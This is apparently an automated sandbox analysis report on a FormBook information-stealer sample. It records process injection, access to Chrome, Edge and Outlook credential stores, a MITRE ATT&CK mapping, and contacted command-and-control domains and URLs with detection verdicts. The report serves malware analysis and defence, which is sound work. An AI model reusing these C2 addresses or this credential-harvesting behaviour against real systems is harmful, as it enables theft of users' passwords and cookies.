            Source: opp46lGmxd.exe, hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8886B cpuid 0_2_00A8886B
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00A950D7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AA2230 GetUserNameW,0_2_00AA2230
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A9418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00A9418A
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00A64AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: opp46lGmxd.exeBinary or memory string: WIN_81
            Source: opp46lGmxd.exeBinary or memory string: WIN_XP
            Source: opp46lGmxd.exeBinary or memory string: WIN_XPe
            Source: opp46lGmxd.exeBinary or memory string: WIN_VISTA
            Source: opp46lGmxd.exeBinary or memory string: WIN_7
            Source: opp46lGmxd.exeBinary or memory string: WIN_8
            Source: opp46lGmxd.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00AD6596
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AD6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00AD6A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS26
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets61
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1454256 Sample: opp46lGmxd.exe Startdate: 09/06/2024 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.magmadokum.com 2->30 32 19 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 50 5 other signatures 2->50 10 opp46lGmxd.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 hKABgfptdlPzDLVJYF.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 2 other signatures 19->58 22 hKABgfptdlPzDLVJYF.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49729, 49730, 49731 SEDO-ASDE Germany 22->34 36 elettrosistemista.zip 195.110.124.133, 49737, 49738, 49739 REGISTER-ASIT Italy 22->36 38 11 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            opp46lGmxd.exe58%ReversingLabsWin32.Trojan.Strab
            opp46lGmxd.exe68%VirustotalBrowse
            opp46lGmxd.exe100%AviraTR/AD.ShellcodeCrypter.yyenj
            opp46lGmxd.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.660danm.top/fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            https://www.reg.ru/whois/?check=&dname=www.b301.space&amp;reg_source=parking_auto0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            https://reg.ru0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/100%Avira URL Cloudmalware
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js0%Avira URL Cloudsafe
            http://www.b301.space/fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            http://www.660danm.top/fo8o/100%Avira URL Cloudmalware
            http://push.zhanzhang.baidu.com/push.js0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/100%Avira URL Cloudmalware
            https://track.uc.cn/collect0%Avira URL Cloudsafe
            https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi&#43;eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdH0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/100%Avira URL Cloudmalware
            https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_0%Avira URL Cloudsafe
            http://www.kasegitai.tokyo/fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            http://www.rssnewscast.com/fo8o/0%Avira URL Cloudsafe
            http://www.magmadokum.com/fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            https://www.reg.ru/hosting/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_host&am0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            http://www.shenzhoucui.com/fo8o/100%Avira URL Cloudmalware
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            http://www.3xfootball.com/fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            https://parking.reg.ru/script/get_domain_data?domain_name=www.b301.space&rand=0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/0%Avira URL Cloudsafe
            https://donnavariedades.com/fo8o?Zl4h1=l0%Avira URL Cloudsafe
            https://www.reg.ru/domain/new/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_new&0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            https://zz.bdstatic.com/linksubmit/push.js0%Avira URL Cloudsafe
            https://musee.mobi/vivaldi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi0%Avira URL Cloudsafe
            https://www.reg.ru/web-sites/website-builder/?utm_source=www.b301.space&utm_medium=parking&utm_campa0%Avira URL Cloudsafe
            https://www.reg.ru/dedicated/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_serve0%Avira URL Cloudsafe
            http://www.antonio-vivaldi.mobi/fo8o/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.elettrosistemista.zip/fo8o/100%Avira URL Cloudmalware
            https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-0%Avira URL Cloudsafe
            http://www.donnavariedades.com/fo8o/0%Avira URL Cloudsafe
            https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pens/popular/?grid_type=list0%Avira URL Cloudsafe
            http://www.b301.space/fo8o/0%Avira URL Cloudsafe
            https://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyM0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js0%Avira URL Cloudsafe
            https://codepen.io/uzcho_/pen/eYdmdXw.css0%Avira URL Cloudsafe
            http://www.shenzhoucui.com/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85100%Avira URL Cloudmalware
            https://www.reg.ru/web-sites/?utm_source=www.b301.space&utm_medium=parking&utm_campaign=s_land_cms&a0%Avira URL Cloudsafe
            https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR100%Avira URL Cloudmalware
            http://www.b301.space0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            http://www.donnavariedades.com/fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            http://www.antonio-vivaldi.mobi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG850%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudphishing

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.660danm.top
            		34.111.148.214
            		truefalse
              		unknown
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		unknown
                shops.myshopify.com
                		23.227.38.74
                		truefalse
                  		unknown
                  natroredirect.natrocdn.com
                  		85.159.66.93
                  		truefalse
                    		unknown
                    www.kasegitai.tokyo
                    		202.172.28.202
                    		truefalse
                      		unknown
                      elettrosistemista.zip
                      		195.110.124.133
                      		truefalse
                        		unknown
                        www.3xfootball.com
                        		154.215.72.110
                        		truefalse
                          		unknown
                          www.shenzhoucui.com
                          		104.206.198.212
                          		truefalse
                            		unknown
                            www.antonio-vivaldi.mobi
                            		46.30.213.191
                            		truefalse
                              		unknown
                              www.goldenjade-travel.com
                              		116.50.37.244
                              		truefalse
                                		unknown
                                www.rssnewscast.com
                                		91.195.240.94
                                		truefalse
                                  		unknown
                                  www.techchains.info
                                  		66.29.149.46
                                  		truefalse
                                    		unknown
                                    www.b301.space
                                    		194.58.112.174
                                    		truefalse
                                      		unknown
                                      www.magmadokum.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.donnavariedades.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.joyesi.xyz
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.liangyuen528.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.empowermedeco.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.k9vyp11no3.cfd
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.elettrosistemista.zip
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.660danm.top/fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.goldenjade-travel.com/fo8o/?Zl4h1=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSEIkTArzNUXX6i8MuAeXF0KENTzWGDok/4=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.empowermedeco.com/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.b301.space/fo8o/?Zl4h1=AU3XYvZFaGSlytwuLg8MPaUQqx3yoZo+slWhncsJrkz7OmZN7i/xsh6l91syvPfChHr514cSZiYi12sQUpLBck89gksl+IJQQsBNVEJ3Y46WCh4jtmLfecQ=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.660danm.top/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.magmadokum.com/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.rssnewscast.com/fo8o/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kasegitai.tokyo/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.kasegitai.tokyo/fo8o/?Zl4h1=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ89eOn9Eslw/yPbbhzQEQvbg5EH2R2vQNh194=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.magmadokum.com/fo8o/?Zl4h1=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckoJS+lg7OgEaCOx4WcoERsgbN8QHC6pJzk=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.shenzhoucui.com/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.3xfootball.com/fo8o/?Zl4h1=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KAVMa+YMk7oXS5ptBuz0n8hBJ8/Hksw4c=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.goldenjade-travel.com/fo8o/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.antonio-vivaldi.mobi/fo8o/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.elettrosistemista.zip/fo8o/false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.donnavariedades.com/fo8o/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.shenzhoucui.com/fo8o/?Zl4h1=CKPof6WmPR8MjyGgZoDlhb60KxQVVSuHH5TS1bRPLOh5omNg/qt+/6bvCL2pthCxfTLrkj/U4P5Lt/hzCRdBCxUtCWRaVQIS6dSVAag1St1hJr7Wk88RO5I=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.b301.space/fo8o/false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.elettrosistemista.zip/fo8o/?Zl4h1=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNMaLujgCrTpNg/TOHpJ8V8eDXM6X/ojyE=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.rssnewscast.com/fo8o/?Zl4h1=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4Jw8jmqxLw67/BJwdjwjaFneB0YC/Adw7Wc=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.donnavariedades.com/fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.antonio-vivaldi.mobi/fo8o/?Zl4h1=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZLGR60o0iKF2B/qr8s1uSeS9C8wWF5VDipMs=&Pbw=PLVXbnG85false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.techchains.info/fo8o/false
                                                    • Avira URL Cloud: phishing
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.jsnetbtugc.exe, 00000004.00000002.3855652610.0000000005358000.00000004.10000000.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000002.3855115184.0000000004378000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000002.3857802306.00000000083EA000.00000004.00000020.00020000.00000000.sdmpfalse
